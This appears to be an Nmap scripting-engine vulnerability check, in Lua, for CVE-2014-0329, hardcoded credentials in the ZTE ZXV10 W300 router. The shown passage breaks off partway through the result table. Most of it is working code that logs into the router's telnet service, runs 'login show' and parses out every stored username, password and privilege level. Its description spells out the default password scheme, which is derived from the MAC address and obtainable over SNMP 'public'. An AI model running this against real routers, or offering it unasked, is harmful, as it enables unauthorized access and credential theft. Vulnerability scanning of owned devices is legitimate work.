ZTE ZXV10 W300无线路由器硬编码凭证安全措施绕过漏洞(2)


--- Logs in to the device's telnet service and dumps the stored accounts.
-- The username, password, "sh", "login show" and "exit" are written in a
-- single send; the reply is read up to (not including) the echoed "exit".
-- Note: this is a plaintext telnet login, so the credentials cross the wire
-- unencrypted — expected for this check, but worth knowing on a shared link.
-- @param host     host table/address passed straight to socket:connect
-- @param user     telnet username
-- @param password telnet password
-- @return true and the raw telnet output on success; otherwise the failing
--   socket call's status and error string (connect, send or receive)
local dump_creds = function(host, user, password)
    local TELNET_PORT = 23
    local TIMEOUT_MS = 5000

    -- CR-separated command script; the trailing "exit" doubles as the
    -- delimiter receive_buf waits for.
    local script = table.concat({user, password, "sh", "login show", "exit"}, "\r") .. "\r"

    local sock = nmap.new_socket("tcp")
    sock:set_timeout(TIMEOUT_MS)

    -- Every exit path closes the socket and passes the result through unchanged.
    local function finish(ok, data)
        sock:close()
        return ok, data
    end

    local ok, err = sock:connect(host, TELNET_PORT)
    if not ok then
        return finish(ok, err)
    end

    ok, err = sock:send(script)
    if not ok then
        return finish(ok, err)
    end

    -- keeppattern=false: the "exit" marker itself is dropped from the output.
    local output
    ok, output = sock:receive_buf("exit", false)
    if not ok then
        return finish(ok, output)
    end

    return finish(true, output)
end


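--- Extracts the credential table printed by the router's "login show" command.
-- Expects a header line matching "Username +Password +Priority" followed by
-- CRLF-terminated rows; each row has its spaces collapsed and is split into
-- three space-separated fields (username, password, priority). A trailing
-- fragment without a CRLF (typically the shell prompt) is ignored.
-- @param response raw telnet output as returned by dump_creds
-- @return true and an array of {username=, password=, priority=} tables on
--   success; false and "Unexpected response value." when the input is not a
--   string, the header is missing, or the header has no terminating CRLF
local parse_response = function(response)
    local UNEXPECTED = "Unexpected response value."

    if type(response) ~= "string" then
        return false, UNEXPECTED
    end

    local hdr = string.find(response, "Username +Password +Priority")
    if not hdr then
        return false, UNEXPECTED
    end

    -- Rows begin after the header's CRLF. This lookup must be guarded: on a
    -- truncated response string.find yields nil and the original "nil + 2"
    -- raised a Lua error instead of the false/message pair callers expect.
    local hdr_end = string.find(response, "\r\n", hdr, true)
    if not hdr_end then
        return false, UNEXPECTED
    end
    response = string.sub(response, hdr_end + 2)

    local result = {}
    local pos = 1
    local eol = string.find(response, "\r\n", pos, true)

    while eol do
        local line = string.sub(response, pos, eol)
        -- Drop the CR, trim both ends and collapse runs of spaces so the
        -- columns are single-space separated for the field pattern below.
        line = string.gsub(line, "\r", "")
        line = string.gsub(line, "^ +", "")
        line = string.gsub(line, " +$", "")
        line = string.gsub(line, " +", " ")

        for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do
            result[#result + 1] = {
                username = user,
                password = pass,
                priority = prio,
            }
        end

        pos = eol + 2
        eol = string.find(response, "\r\n", pos, true)
    end

    return true, result
end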


action = function(host)
    local vuln = {
        title = "ZTE ZXV10 W300 router contains hardcoded credentials",
        state = vulns.STATE.NOT_VULN,
        IDS = {CVE = 'CVE-2014-0329'},
        risk_factor = "High",
        scores = {
            CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
        },
        description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
service on the device. The username is "admin" and the password is "XXXXairocon"
where "XXXX" is the last four characters of the device's MAC address. The MAC address
is obtainable over SNMP with community string public.]],
        references = {
            "https://www.kb.cert.org/vuls/id/228886",
            "https://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"
        },
        dates = {
            disclosure = {year = 2014, month = 2, day = 3},
        },
        exploit_results = {},
    }
